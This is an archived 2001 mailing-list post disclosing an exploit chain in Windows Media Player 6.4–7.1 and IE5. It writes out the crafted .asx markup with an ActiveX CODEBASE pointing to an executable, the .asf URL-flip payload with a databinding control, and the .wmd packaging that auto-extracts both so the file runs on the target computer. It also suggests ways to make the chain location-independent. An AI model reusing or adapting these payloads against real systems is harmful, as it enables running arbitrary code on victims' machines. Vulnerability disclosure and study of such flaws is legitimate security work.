> - ---------------------------------------------------------------------- > Title: Windows Media Player .NSC Processor Contains Unchecked > Buffer > Date: 26 July 2001 > Software: Windows Media Player 6.4, 7, and 7.1 > Impact: Run code of attacker's choice. > Bulletin: MS01-042 Here, while you are about it, take a look at this: Windows Media Player executing files on the target computer as follows: 1. Create an *.asx meta file as follows: <ASX><Entry><ref HREF=''/></ASX> <IFRAME SRC='about:<body><html><OBJECT CLASSID="CLSID:10000000-0000-0000-0000-000000000000" CODEBASE="C:\WINDOWS\Regedit.exe"></OBJECT></html></body>'></IFRAME> <!-- 27.07.01 http://www.malware.com --> 2. Create an *.asf file with URL flip as follows: about:<OBJECT ID="Content" WIDTH=0 HEIGHT=0 CLASSID="CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="file://C:\My Documents\My Music\Virtual Albums\malware\malware.asx"><PARAM NAME="UseHeader" VALUE="true"></OBJECT><div datasrc=#Content datafld="<ASX><Entry><ref HREF=''/></ASX>" dataformatas="HTML" style="width: 100%; height: 60%;"></div> 3. Create a *.wmd file comprising 1 and 2 above. What happens? Ordinarily the Windows Media Download Package file (*.wmd) creates a folder with the given name of the *.wmd file -- e.g. malware.wmd will create a folder called malware in the default location for so-called "Virtual Music" -- specifically: My Documents\My Music\Virtual Albums\malware, security measures currently incorporated in the extraction of the contents of the *.wmd do a reasonably good job of ensuring that files contained within the Download Package, are in fact valid files. A reasonably good job. We find that the bare minimum for the *.asx meta file must include the following: <ASX><Entry><ref HREF=''/></ASX> with these tags the Media Player will indeed extract the *.asx file into our known folder. So how do we make use of that? Databinding. We find that we can parse html using the databinding control included in IE5. And we do it like so: the databinding control requires a header to match what it is to write as html. What we do, quite brilliantly actually, is use the *.asx header as our header for the databinding control: *.asx - <ASX><Entry><ref HREF=''/></ASX> databinding control: datafld="<ASX><Entry><ref HREF=''/></ASX>" The Windows Media Package file (malware.wmd) is automatically opened from web or news or mail, it automatically creates the malware folder in the so-called 'Virtual Music" directory. It automatically extracts the malware.asx meta file, which is valid but includes our Active X component as above, and it extracts our malware.asf file which includes our URL flip. The URL flip is called once the malware.asf starts playing, it creates an "about" window from within the malware folder, the "about" window includes our databinding control which points to the malware.asx which rendered as *.html because the datafld header *IS* the *.asx meta tag ! And that all in turn executes! our file on the target computer. notes: 1. the machine that this is all on is now dead thanks to your module MSDXM.OCX which will require a reformat. Nevertheless a fully functional example has been thoroughly tested in "the field" 2. the "free" Advanced Script Indexer that comes with the Windows Media 7 Resource Kit allows us to include in the URL flip whatever we like. 3. the path to the so-called "Virtual Music" directory is hard-coded in the above. The possibility of not having to know the location is good because everything is opened from within the same folder created by the Windows Media Download package i.e. possibly through a "skin" file, or some other entry in the *.asx such as an <event> parameter coupled with scripting in the *.asf or *.wmz file(s), relative paths should work. 4. when it suits us, we'll recompile the working example if none of the above is clear. 5. it took 10 days to conceive, craft and construct, of which about 5 days were spent crashing and scandisk"ing" at minimum 4 times per day. Win98. Very unstable. --- http://www.malware.com _______________________________________________________ Send a cool gift with your E-Card http://www.bluemountain.com/giftcenter/
This archive was generated by hypermail 2b30 : Fri Jul 27 2001 - 10:45:11 PDT